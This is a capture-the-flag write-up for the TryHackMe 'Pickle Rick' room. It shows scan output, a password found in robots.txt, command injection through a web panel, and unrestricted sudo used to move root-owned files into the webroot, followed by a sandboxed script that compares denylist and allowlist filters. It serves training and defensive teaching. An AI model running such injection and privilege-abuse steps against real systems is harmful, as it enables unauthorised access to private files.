THM — Pickle Rick
Nmap Scan
root@kali:~# nmap -sC -sV -O -T4 10.10.202.157
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-04 01:07 EST
Nmap scan report for 10.10.202.157
Host is up (0.36s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 5e:f6:90:db:53:33:48:65:85:58:47:38:e1:b1:3e:92 (RSA)
|   256 1c:42:c6:81:88:0d:cb:4a:99:1f:60:58:65:9a:55:ee (ECDSA)
|_  256 c9:e8:9e:19:f8:c2:97:1a:4a:f7:df:18:27:45:b6:89 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/4%OT=22%CT=1%CU=43191%PV=Y%DS=4%DC=I%G=Y%TM=5FF2B108
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=F8%GCD=1%ISR=10F%TI=Z%CI=I%II=I%TS=8)SEQ(S
OS:P=F5%GCD=1%ISR=10E%TI=Z%CI=I%TS=8)SEQ(SP=FB%GCD=1%ISR=10E%TI=Z%II=I%TS=8
OS:)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M50
OS:8ST11NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF
OS:)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
OS:T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A
OS:=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%D
OS:F=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=4
OS:0%CD=S)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.59 seconds
Gobuster Scan
root@kali:~# gobuster dir -u 10.10.202.157 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html,.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.202.157
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,txt
[+] Timeout:        10s
===============================================================
2021/01/04 01:11:06 Starting gobuster
===============================================================
/index.html (Status: 200)
/login.php (Status: 200)
/assets (Status: 301)
/portal.php (Status: 302)
/robots.txt (Status: 200)
Progress: 9230 / 220561 (4.18%)
^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/01/04 01:33:50 Finished
===============================================================
Nikto scan
root@kali:/opt/nikto/program# ./nikto.pl -h 10.10.202.157
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.202.157
+ Target Hostname:    10.10.202.157
+ Target Port:        80
+ Start Time:         2021-01-04 01:31:06 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip
+ Cookie PHPSESSID created without the httponly flag
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 8079 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2021-01-04 02:22:35 (GMT-5) (3089 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The homepage at http://10.10.202.157/.
Found a username: R1ckRul3s
/login.php
Found a login page.
Testing with the credentials admin:admin.
The response gives no indication of whether a particular username is valid, so the login form does not look usable for username enumeration.
/assets
Nothing of interest here.
/robots.txt
Found an odd string. It might be a password.
Let's try to log in with this set of credentials:
R1ckRul3s:Wubbalubbadubdub
And I was able to log in.
Since the target is running Linux, we can try the ls command in the portal's command input.
Trying cat Sup3rS3cretPickl3Ingred.txt does not work, as shown below.
whoami
pwd
I tried to get a reverse shell through the OS command injection, with the help of this page, but did not succeed.
Since we can't cat the contents out, I realized we could simply browse to the file in the browser, since all the files listed by ls are stored in the webroot directory.
Found the first ingredient.
Using the clue, let’s look around the system for the other ingredients.
ls /home
ls /home/rick
sudo -l
The output shows that we can run any command with sudo.
sudo ls /root
This lists a file named 3rd.txt. The chained command
sudo ls /root && cat 3rd.txt
does not work either, since the cat command has been disabled in the panel (and even if it were allowed, cat 3rd.txt would look in the current working directory, not in /root).
sudo mv /root/3rd.txt /var/www/html
With this command I was able to move the file from the root folder to the HTML folder, so that I could view its contents through the browser.
The third ingredient found: fleeb juice.
Now let’s hunt the second ingredient.
mv /home/rick/'second ingredients' /var/www/html
does not work.
Let's view the permissions on second ingredients.
Looks like I have to use sudo to move it.
sudo mv /home/rick/'second ingredients' /var/www/html
Found the second ingredient.
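The following is an added example, not from this writeup and not the room's own code. It ties together the two observations above: the panel refuses cat, yet sudo mv into the webroot still exposes /root files. It assumes the panel's filter is a plain denylist on the word cat (the page only shows that cat is refused), replaces /root and /var/www/html with a throwaway sandbox, uses a plain mv where the writeup needs sudo mv, and fills 3rd.txt with constructed content. A hardened allowlist filter is shown beside the denylist to make the contrast concrete.

```shell
#!/bin/sh
# Added example (not from the writeup): a command panel that denylists "cat"
# does not protect /root once the panel user can run any command with sudo.
# Everything below runs in a temporary sandbox; no real /root or sudo is touched.
set -u

# Constructed sandbox standing in for the target filesystem (assumption).
SANDBOX=$(mktemp -d)
trap 'rm -rf "$SANDBOX"' EXIT
ROOT_DIR="$SANDBOX/root"                 # stands in for /root
WEBROOT="$SANDBOX/var/www/html"          # stands in for the Apache webroot
mkdir -p "$ROOT_DIR" "$WEBROOT"
printf 'fleeb juice\n' > "$ROOT_DIR/3rd.txt"   # constructed content for the third ingredient

# Constructed denylist filter, assumed to resemble the panel's check: refuse any
# command line containing the word "cat", allow everything else.
# Returns 0 (allowed) or 1 (blocked).
denylist_filter() {
    case " $1 " in
        *" cat "*) return 1 ;;
        *) return 0 ;;
    esac
}

# Hardened alternative: reject any line carrying shell metacharacters (so
# chaining with "&&", ";" or "|" never reaches a shell), then allow only a few
# harmless first words. "sudo mv ..." is refused because sudo is not listed.
allowlist_filter() {
    if printf '%s' "$1" | grep -q '[;&|$`<>(){}]'; then
        return 1
    fi
    set -f            # no globbing while splitting the line into words
    set -- $1
    set +f
    case "${1:-}" in
        ls|whoami|pwd) return 0 ;;
        *) return 1 ;;
    esac
}

# What the writeup does once sudo -l shows unrestricted sudo: move the file
# out of /root into the webroot. Inside the sandbox a plain mv stands in for
# "sudo mv /root/3rd.txt /var/www/html".
expose_via_webroot() {
    mv "$ROOT_DIR/3rd.txt" "$WEBROOT/3rd.txt"
}

# Stands in for browsing to http://<target>/3rd.txt: the web server returns
# whatever sits in the webroot, and the panel's command filter never runs.
fetch_from_webroot() {
    cat "$WEBROOT/$1"
}

# Filter decisions as named functions so a caller can check them.
blocked_cat()           { ! denylist_filter 'cat Sup3rS3cretPickl3Ingred.txt'; }
blocked_chain()         { ! denylist_filter 'sudo ls /root && cat 3rd.txt'; }
allowed_mv()            { denylist_filter 'sudo mv /root/3rd.txt /var/www/html'; }
hardened_blocks_mv()    { ! allowlist_filter 'sudo mv /root/3rd.txt /var/www/html'; }
hardened_blocks_chain() { ! allowlist_filter 'ls && cat 3rd.txt'; }
hardened_allows_ls()    { allowlist_filter 'ls /home/rick'; }

# Stand-alone run: print each filter's verdict, then perform the bypass.
main() {
    for cmd in 'cat Sup3rS3cretPickl3Ingred.txt' \
               'sudo ls /root && cat 3rd.txt' \
               'sudo mv /root/3rd.txt /var/www/html'; do
        if denylist_filter "$cmd"; then d=allowed; else d=blocked; fi
        if allowlist_filter "$cmd"; then a=allowed; else a=blocked; fi
        printf 'denylist: %-8s allowlist: %-8s %s\n' "$d" "$a" "$cmd"
    done
    expose_via_webroot
    printf 'GET /3rd.txt -> %s\n' "$(fetch_from_webroot 3rd.txt)"
}

main
```

The denylist lets the mv through because it only looks for one command name, and the file it was meant to protect is then served by Apache with no filter in the path at all. The allowlist refuses both the chained cat and the sudo mv, but it is still only a mitigation: the root cause the writeup exposes is a web-facing account that can run any command with sudo, and no input filter on the panel fixes that.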